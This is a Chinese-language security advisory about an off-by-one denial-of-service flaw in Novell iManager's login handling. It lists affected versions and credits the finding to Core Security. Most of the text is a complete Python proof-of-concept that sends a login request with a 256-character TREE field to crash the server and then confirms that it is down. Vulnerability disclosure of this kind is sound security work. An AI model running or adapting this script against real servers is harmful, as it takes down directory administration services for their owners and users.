Novell iManager超长TREE字段单字节拒绝服务漏洞

漏洞起因
边界条件错误
危险等级

 
影响系统
Novell iManager 2.7.3
Novell iManager 2.7.2
Novell iManager 2.7.1
Novell iManager 2.5
Novell iManager 2.0.2
Novell iManager 2.0
Novell iManager 1.5
Novell iManager 2.7.3 FTF2
Novell iManager 2.7.0
Novell iManager 2.6.0
 
不受影响系统
Novell iManager 2.7.4
Novell iManager 2.7.3 FTF4
 
危害
远程攻击者可以利用漏洞使应用程序崩溃。
 
攻击所需条件
攻击者必须访问Novell iManager。
 
漏洞信息
Novell iManager是一款基于WEB的应用程序,可以使用无线设备管理、配置Novell eDirectory对象。
负责Novell iManager登录处理代码存在单字节错误,远程未验证用户可使iManager WEB服务程序崩溃。
iManager登录页面中的三个输入字段都定义了最大长度为256字节的大小,以限制每个字段可输入的字符数。但是,如果发送给WEB服务器的登陆请求中包含一个长度为256字符的TREE字段,iManager Tomcat web服务器会崩溃,导致应用程序不可用。
 
测试方法
#Usage: $ python poc.py <iManager_IP> <iManager_Port>
#E.g:  $ python poc.py 192.168.0.1 48080
import socket
import sys
import time
import httplib
def server_uses_SSL(host, port):
    #Try to determine if the server is using HTTP over SSL or not.
    headers = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)’,
                ‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,
                ‘Accept-Language’: ‘en-us,en;q=0.5’,
                ‘Accept-Charset’: ‘ISO-8859-1,utf-8;q=0.7,*;q=0.7’,
                ‘Connection’:’close’}
    using_ssl = True
    conn = httplib.HTTPSConnection(host, port)
    try:
        conn.request(‘GET’, ‘/nps/servlet/webacc’, headers=headers)
        response = conn.getresponse()
    except socket.sslerror:
        using_ssl = False
    finally:
        conn.close()
    return using_ssl
def post_urlencoded_data(host, port, selector, body, use_ssl, get_resp=True):
    headers = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)’,
                ‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,
                ‘Accept-Language’: ‘en-us,en;q=0.5’,
                ‘Accept-Charset’: ‘ISO-8859-1,utf-8;q=0.7,*;q=0.7’,
                ‘Referer’: ‘http://%s:%s%s’ % (host, port, ‘/nps/servlet/webacc’),
                ‘Content-Type’:’application/x-www-form-urlencoded’,
                ‘Content-Length’: str(len(body)),
                ‘Connection’:’close’}
    if use_ssl:
        conn = httplib.HTTPSConnection(host, port)
    else:
        conn = httplib.HTTPConnection(host, port)
    conn.request(‘POST’, selector, body, headers)
    html = ”
    #This flag allows me to avoid keeping waiting for a server response in the last step, when the webserver is crashed
    if get_resp:
        response = conn.getresponse()
        html = response.read()
    conn.close()
    return html
def getPostParameters():
    params  = ‘rank=primary&DoLogin=true&forceMaster=false’
    params += ‘&username=admin&password=mipass&tree=%s&Entrada.x=27&Entrada.y=13’ % (‘A’ * 256)
    return params
def main():
    host = sys.argv[1]
    port = int(sys.argv[2])
    #Determine if the server uses plain HTTP (iManager Workstation) or HTTPS (iManager Server)
    uses_ssl = server_uses_SSL(host, port)
    if uses_ssl:
        print ‘(+) The server uses HTTP over SSL. Guessed target: iManager Server.’
    else:
        print ‘(+) The server uses plain HTTP. Guessed target: iManager Workstation.’
    print ‘(+) Sending login request with 256-character long TREE field…’
    post_urlencoded_data(host, port, ‘/nps/servlet/webacc’, getPostParameters(), uses_ssl, False)
    print ‘(+) Malicious request successfully sent.’
    #Wait 10 seconds and try to connect again to iManager, to check if it’s down
    print ‘(+) Waiting 10 seconds before trying to reconnect to iManager…’
    time.sleep(10)
    try:
        print ‘(+) Trying to reconnect…’
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print ‘(!) Something went wrong. Novell iManager is still alive.’
    except socket.error:
        print ‘(*) Attack successful. Novell iManager is down.’
if __name__ == ‘__main__’:
    main()
 
厂商解决方案
目前没有详细解决方案提供:
http://www.novell.com/products/consoles/imanager/features.html
 
漏洞提供者
Francisco Falcon from Core Security Technologies

发表评论?

0 条评论。

发表评论